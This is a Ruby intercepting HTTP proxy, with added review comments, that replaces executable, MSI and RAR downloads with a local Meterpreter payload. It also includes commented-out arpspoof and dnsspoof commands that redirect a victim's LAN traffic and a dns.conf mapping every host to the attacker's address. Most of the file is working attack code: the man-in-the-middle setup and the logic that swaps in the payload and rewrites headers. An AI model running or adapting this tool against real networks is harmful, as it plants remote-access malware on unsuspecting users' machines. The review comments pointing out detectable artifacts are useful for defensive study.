- # Usage: sudo ruby proxy.rb PORT -- plaintext-HTTP intercepting proxy that swaps matching file downloads for a local payload file
- # Example: sudo ruby proxy.rb 666
- # sudo is needed for opening the socket
- require 'eventmachine' # requires the eventmachine gem to be installed
- prox_port=ARGV[0] # listening port, taken unvalidated from the first command-line argument
- attacker_ip="192.168.0.2" # address the proxy binds to (see start_server at the bottom) and the address written into dns.conf below
- meterpreter="/tmp/meterpreter" # payload base path; search this script and replace /home/bigmac/tmp/meterpreter. NOTE(review): this variable is not read by the visible code, which hard-codes "/tmp/meterpreter" in Client#receive_data
- # expected payload files: meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
- # if a payload file exists with the file extension the client is attempting to download, the response is switched for it
- dns = File.open("dns.conf", "w+") # creates or truncates dns.conf in the working directory; it is only consumed by the commented-out dnsspoof step below
- dns.write("#{attacker_ip} *.*")# one entry mapping the pattern *.* to this host's ip
- dns.close
- # uncomment these lines when you want to use arpspoof/dnsspoof; on the LAN this step shows up as conflicting ARP replies for the gateway and forged DNS answers
- #victim="192.168.1.111"
- #gateway="192.168.1.1"
- #`pkill spoof`
- #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
- #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
- #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
- #a.run
- #b.run
- #c.run
- Thread.start{
- class Client < EM::Connection # upstream side of the proxy: forwards the client's request to the real server and relays or substitutes the response; it only handles plaintext HTTP, so downloads fetched over HTTPS with certificate validation, or checked against a signature or published hash, are the relevant controls
- def initialize(other, finger, *args, &blk) # other: the browser-side connection that created this one; finger: raw request text to forward
- @other, @finger = other, finger
- super(*args, &blk)
- end
- def post_init # forwards the stored request upstream and records which listed extension the request mentions
- @payload_extension=""
- send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") # forward the request with the Accept-Encoding header name mangled so the server is not asked for gzip; the misspelled "Assept-Ensoding:" header is a detectable artifact on the wire
- for x in [".exe",".rar",".msi"]# payload format list, checking the request text for a file extension... add more of these to the list
- extension_check=@finger.scan(/#{x}/).to_s # stringified scan result for this extension
- if extension_check.length>1
- @payload_extension<<extension_check
- end
- end
- if @payload_extension.length==0 # no-op: re-assigns the empty string when nothing was appended
- @payload_extension=""
- end
- end
- #Content-Type: application/x-msdos-program
- #Content-Type: application/x-msdownload
- #Content-Type: application/octet-stream
- #Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
- #Content-Type: application/x-rar
- #Content-Type: application/octet-stream
- # a list of possible application download content types... maybe check the GET request for jar? exe? msi? rar?
- def receive_data(response) # called with data received from the upstream server; this is the part that the web client will see, either relayed or with the body replaced
- clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","") # Content-Length digits, taken from the stringified scan result
- if response.scan("Content-Length: ").to_s == "Content-Length: " # continue only when the stringified scan equals the bare header name
- if @payload_extension.length>1 # continue only when post_init recorded something in @payload_extension
- for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # Content-Type values treated as a file download; add more triggers to this list
- if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger
- if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")# payload file must exist at the hard-coded /tmp path with the recorded extension
- puts " injecting #{@payload_extension} SUCCESS"# logs the substitution to stdout
- payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")# reads the whole payload file into memory; guarded by the exists? check above
- headers,body = response.split("\r\n\r\n", 2) # split at the first blank line into header block and body; body is not used afterwards
- @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload # original headers with the Content-Length digits replaced by the payload size, then the payload in place of the real body; every other header still describes the genuine file
- else
- puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
- end
- end
- end #start for trigger loop
- end#start of if payload extension.length
- end
- @other.send_data response
- # intended for the no-injection case: pass the unmodified response to the web browser client
- end
- end
- #browser open to http://192.168.1.114
- module EchoServer # browser-facing handler given to start_server; opens one upstream Client connection per call to receive_data
- def receive_data(finger) #finger is the header received from the client, could log these cookies or log these pages
- ping = finger.gsub(" ","").index("Host:") # offset of "Host:" in the request with spaces removed (nil when there is no Host header)
- pong = finger.gsub(" ","").index("\n",ping) # offset of the newline that ends the Host line
- host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp # Host header value (old method for gathering the host: field... could shorten this); NOTE(review): used below as the connect target with no validation
- # I don't know if this will prevent loading from cache
- data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:") # conditional-request header names are mangled, intended to make the server send a full body; the misspelled names are a detectable artifact on the wire
- EventMachine::connect host, 80, Client, self, data # open a plaintext connection to the requested host on port 80 and hand Client this connection plus the rewritten request
- end
- end
- }
- EventMachine::run { # start the EventMachine reactor
- EventMachine::start_server attacker_ip, prox_port, EchoServer # listen on attacker_ip:prox_port and handle each inbound connection with EchoServer
- } # YOUR IP